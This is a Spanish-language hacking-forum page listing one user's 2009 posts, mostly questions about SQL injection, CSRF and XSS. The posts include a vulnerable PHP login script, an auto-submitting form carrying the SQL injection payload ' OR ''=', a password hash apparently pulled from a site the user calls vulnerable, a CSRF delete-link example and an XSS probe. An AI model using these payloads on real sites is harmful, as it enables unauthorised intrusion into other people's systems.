elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13
61  Seguridad Informática / Nivel Web / SQLi en login... en: 7 Diciembre 2009, 17:34 pm
Tengo un problema yo otra vez....

Código:
<?  include("../Connections/conn_ig.php"); 

echo $usuario = $HTTP_POST_VARS["usuario"];
echo $contrasena = $HTTP_POST_VARS["contrasena"];

$ssql = "SELECT * FROM usuarios WHERE nombre_usuario='$usuario' and clave_usuario='$contrasena'";

$rs = mysql_query($ssql,$cosa);
$row=mysql_fetch_array($rs);

if (mysql_num_rows($rs)!=0){



//usuario y contraseña válidos and tipo='admin'
//defino una sesion y guardo datos
session_start();
session_register("autentificado");
$_SESSION["autentificado"]= "SI"; 
//panel.php tiene el panel de control
header("Location: panel.php");
}

?>
Tengo este codigo que autentifica al usuario que se conecta a la pagina... Que creo que es vulnerable a SQL Injection.

Realizo este codigo:
Código:
<body onload="document.forms[0].submit()">
<form action="http://www.pagina.com.ar/conectar.php" method="post">
<input type="text" Name="usuario" Value="admin">
<input type="text" Name="contrasena" Value="' OR ''='">
</form>
Pero no me funciona... Alguien me podria guiar?
62  Seguridad Informática / Nivel Web / Re: Clave cifrada? (SQLi) en: 7 Diciembre 2009, 09:14 am
ingresa como usuario y vee si esa web te deja una cookie y mira si te deja un valor similar a ese, si es asi entonces reemplaza tu valor por el que encontraste y te cambias tambien el valor que identifica al usuario que por lo general es el id de usuario y con eso ya deberias poder ingresar sin la necesidad de saber que es ese hash.
:o

Eso no sabia...

Bueno la unica cookie que tengo es la de PHPSESSID y probe cargar lo que puse asi no mas y no funciona y si pongo con el * la pagina vulnerable salen por todos lados errorres de SQL (por caracter no valido)  :xD
63  Seguridad Informática / Nivel Web / Clave cifrada? (SQLi) en: 6 Diciembre 2009, 23:27 pm
Bueno....

Me encontre una pagina vulnerable a SQL Injection y realizo un select de la tabla usuarios....
Y me encuentro que el campo "clave" me muestra eso:
*797F6CDD79A92E41F94E2D406CDCD567D87B2730

No tengo la mas palida idea..... Alguien me guia?
64  Seguridad Informática / Materiales y equipos / Re: ¡¡ Tarjetas wifi PCI con Mucha potencia ¡¡ en: 2 Diciembre 2009, 17:18 pm
No entendi.
65  Seguridad Informática / Nivel Web / Re: Que es CSRF? en: 2 Diciembre 2009, 09:03 am
Gracias!
Funciona a la perfeccion :D
66  Seguridad Informática / Nivel Web / Re: Que es CSRF? en: 2 Diciembre 2009, 07:38 am
Ajam, entonces el ejemplo que dije esta bien no?

En donde estamos en una pagina de noticias. En donde "/admin/" estan todas las paginas para manejar las noticias.
Y si ponemos un link de este tipo que te elimina la noticia (que pide confirmacion por get)
Es un CSRF no? Estoy en lo correcto?
67  Seguridad Informática / Nivel Web / Que es CSRF? en: 1 Diciembre 2009, 12:36 pm
Tengo esta gran duda... Que es CSRF? Que tipo de daños hace?
La unica info que encuentro me deja con mas dudas...

Entonces esto podria ser un CRSF a un "gestor" de contenidos?:
www.pagina.com/admin/eliminarnota.php?notaID=62&Confirmar=Si
68  Seguridad Informática / Nivel Web / Re: Buscador con variable oculta? en: 25 Noviembre 2009, 17:50 pm
Jajajajajja muchimas gracias.
estuve renegando con el POST (que se cero de php), me descarge un complemento "Tamper data" y me mostro los datos que me faltaba!
69  Seguridad Informática / Nivel Web / Re: Buscador con variable oculta? en: 25 Noviembre 2009, 12:53 pm
Sip a XSS es vulnerable.
Pero como hago un  link de eso?
70  Seguridad Informática / Nivel Web / Buscador con variable oculta? en: 25 Noviembre 2009, 12:35 pm
Tengo un problema bastante pelotudo....

Tengo un buscador en donde la palabra e busqueda estaba en palabra

ejemplo.php?palabra=<script>alert()

Ahora.... el problema es que modificaron para supuestamente evitar XSS
Y ahora solo me muestra:

ejemplo.php

Como sabria cual es la variable oculta?
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines